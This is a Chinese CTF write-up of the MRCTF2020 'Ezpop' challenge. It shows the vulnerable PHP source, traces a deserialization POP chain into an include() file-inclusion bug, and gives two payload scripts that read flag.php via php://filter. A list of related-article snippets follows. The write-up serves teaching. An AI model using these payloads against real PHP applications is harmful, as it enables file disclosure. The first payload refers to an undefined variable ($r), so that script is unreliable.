那次某信内部比赛中有道pop链问题的题目,我当时没有做出来,所以在此总结一下,本次以buu上复现的[MRCTF2020]Ezpop为例。

题目

 1 Welcome to index.php

 2 <?php

 3 //flag is in flag.php

 4 //WTF IS THIS?

 5 //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95

 6 //And Crack It!

 7 class Modifier {

 8     protected  $var;

 9     public function append($value){

10         include($value);

11     }

12     public function __invoke(){

13         $this->append($this->var);

14     }

15 }

16

17 class Show{

18     public $source;

19     public $str;

20     public function __construct($file='index.php'){

21         $this->source = $file;

22         echo 'Welcome to '.$this->source."<br>";

23     }

24     public function __toString(){

25         return $this->str->source;

26     }

27

28     public function __wakeup(){

29         if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {

30             echo "hacker";

31             $this->source = "index.php";

32         }

33     }

34 }

35

36 class Test{

37     public $p;

38     public function __construct(){

39         $this->p = array();

40     }

41

42     public function __get($key){

43         $function = $this->p;

44         return $function();

45     }

46 }

47

48 if(isset($_GET['pop'])){

49     @unserialize($_GET['pop']);

50 }

51 else{

52     $a=new Show;

53     highlight_file(__FILE__);

54 }

分析

将涉及到的魔法函数先列出一下:

__construct   当一个对象创建时被调用,

__toString   当一个对象被当作一个字符串被调用。

__wakeup()   使用unserialize时触发

__get()    用于从不可访问的属性读取数据

#难以访问包括:(1)私有属性,(2)没有初始化的属性

__invoke()   当脚本尝试将对象调用为函数时触发

大致分析一下,这道题主要存在两个点:

1.序列化pop链
利用几个类之间相互关联进行构造
2.文件包含漏洞
Modifier类中append函数使用了include(),会出现文件包含漏洞。

详细分析

1.根据以上题目,当用get方法传一个pop参数后,会自动调用Show类的_wakeup()魔术方法。

2._wakeup()通过preg_match()将$this->source做字符串比较,如果$this->source是Show类,就调用了__toString()方法;

3.如果__toString()其中str赋值为一个实例化的Test类,那么其类不含有source属性,所以会调用Test中的_get()方法。

4.如果_get()中的p赋值为Modifier类,那么相当于Modifier类被当作函数处理,所以会调用Modifier类中的_invoke()方法。

5.利用文件包含漏洞,使用_invoke()读取flag.php的内容。

Modifier::__invoke()<--Test::__get()<--Show::__toString()

总结

首先反序列化一个实例化的Show($a),就会调用_wakeup(),其中$a会被赋值给source。所以让$a是一个实例化的Show类,这样就会调用_tostring(),然后让里面的$a这个Show类中的str赋值为Test()类,然后让str这个Test()类中的p赋值为Modifier()类。

payload1

 1 <?php

 2 class Show{

 3     public $source;

 4     public $str;

 5 }

 6

 7 class Test{

 8     public $p;

 9

10

11 }

12 class Modifier{

13     protected $var = "php://filter/convert.base64-encode/resource=flag.php";

14

15 }

16 $s = new Show();

17 $t = new Test();

18 $m = new Modifier();

19 $s->source = $s;

20 $s->str = $t;

21 $t->p = $r;

22 var_dump(urlencode(serialize($s)));

23

24 ?>

payload2

 1 <?php

 2 class Modifier{

 3

 4     protected $var = "php://filter/convert.base64-encode/resource=flag.php";

 5 }

 6

 7 class Show{

 8     public $source;

 9     public $str;

10     public function __construct(){

11         $this->str = new Test();

12

13     }

14

15 }

16 class Test{

17     public $p;

18     public function __construct(){

19

20         $this->p = new Modifier();

21     }

22

23 }

24 $a = new Show();

25 $b = new Show();

26 $b->str = "";

27 $b->source = $a;

28 var_dump($b);

29 var_dump(urlencode(serialize($b)));

30 ?>

参考:https://blog.csdn.net/weixin_43952190/article/details/106016260

[BJDCTF2020]EzPHP-POP链的更多相关文章

  1. 2019强网杯web upload分析(pop链)

    参考链接:https://blog.csdn.net/qq_41173457/article/details/90724943 注意 只要namespace相同那就可以直接实例化同一namespace ...

  2. [BJDCTF2020]EzPHP

    [BJDCTF2020]EzPHP 解码:http://794983a5-f5dc-4a13-bc0b-ca7140ba23f3.node3.buuoj.cn/1nD3x.php 源代码: <? ...

  3. Smarty 3.1.34 反序列化POP链(任意文件删除)

    Smarty <= 3.1.34,存在任意文件删除的POP链. Exp: <?php class Smarty_Internal_Template { public $smarty = n ...

  4. PHP审计之POP链挖掘

    PHP审计之POP链挖掘 前言 续上文中的php反序列化,继续来看,这个POP的挖掘思路.在其中一直构思基于AST去自动化挖掘POP链,迫于开发能力有限.没有进展,随后找到了一个别的师傅已经实现好的项 ...

  5. php反序列化之pop链构造

    本题是某信有一次内部比赛的题目,涉及到pop链的构造问题,所以在这里与大家分享一下 题目 查看源码 逻辑是当参数fn存在且不包含string.zlib.flag这三个字符串时,进行文件包含这里的过滤是 ...

  6. pop链构造

    class Person { private $name; private $sex; private $age; //__set()方法用来设置私有属性 function __set($proper ...

  7. 构造注入链:POP

    1.POP链原理简介: 在反序列化中,我们能控制的数据就是对象中的属性值,所以在PHP反序列化中有一种 漏洞利用方法叫"面向属性编程",即POP( Property Oriente ...

  8. ThinkPHP v5.1.x POP 链分析

    环境:MacOS 10.13 MAMAP Prophp 7.0.33 + xdebugVisual Studio Code前言我所理解的 POP Chain:利用魔术方法并巧妙构造特殊属性调用一系列函 ...

  9. yso中URLDNS的pop链分析(重新分析整理)

    #发现之前对这个链关注的点有点问题,重新分析了一下 由于最近面试的过程中被问到了yso中URLDNS这个pop链的工作原理,当时面试因为是谈到shiro的怎么检测和怎么攻击时谈到了这个.其实在实战中用 ...

随机推荐

  1. 学习整理--vue篇(1)

    vue学习 vue指令 模板指令: v-model:绑定data数据实现数据双向绑定 v-html:绑定模板内容,可书写标签 v-text:绑定数据实现单向绑定 可缩写为{{}} 支持逻辑运算 可结合 ...

  2. 前端浅谈-协议相关(DNS协议)

    从应用层到实体层的协议太多了,我们并不能一一涉及,目前来说就打算整理可能会与前端相关的协议. 前端面试常会问到一个问题-"从输入一个url到页面渲染经历了哪些过程".这其实是一个相 ...

  3. [BUUCTF]PWN——hitcontraining_uaf

    [BUUCTF]--hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的 ...

  4. CSS选择器类型总结

    CSS选择器类型总结 1.通用选择器 一般用于给所有元素做一些通用性的样式设置,比如清除内边距.外边距等.但是效率比较低,尽量不要使用. * { margin: 0; padding: 0; } 2. ...

  5. CF1491A K-th Largest Value 题解

    Content 你有一个长度为 \(n\),并且仅包含 \(0/1\) 的数组 \(a\).现在对这个序列做以下两种操作之一共 \(q\) 次: \(1\) \(x\):将 \(a_x\) 修改为 \ ...

  6. 在myeclipse里加大tomcat内存,jdk内存方法

    这是在myeclipse里加大的方法: -Xms4096m -Xmx4096m -XX:MaxNewSize=4096m -XX:MaxPermSize=4096m 如图所示: -XX:PermSiz ...

  7. ligerui有时候竖直的线没对齐,是因为某一列的内容太长,此刻可以调整一下此列的宽度为适当的值便可消除此现象

    ligerui有时候竖直的线没对齐,是因为某一列的内容太长,此刻可以调整一下此列的宽度为适当的值便可消除此现象

  8. JAVA简单整合protoc文件

    引入maven <dependency> <groupId>com.google.protobuf</groupId> <artifactId>prot ...

  9. 【LeetCode】1095. 山脉数组中查找目标值 Find in Mountain Array

    作者: 负雪明烛 id: fuxuemingzhu 个人博客:http://fuxuemingzhu.cn/ 目录 题目描述 题目大意 解题方法 二分查找 日期 题目地址:https://leetco ...

  10. 【LeetCode】Largest Number 解题报告

    [LeetCode]Largest Number 解题报告 标签(空格分隔): LeetCode 题目地址:https://leetcode.com/problems/largest-number/# ...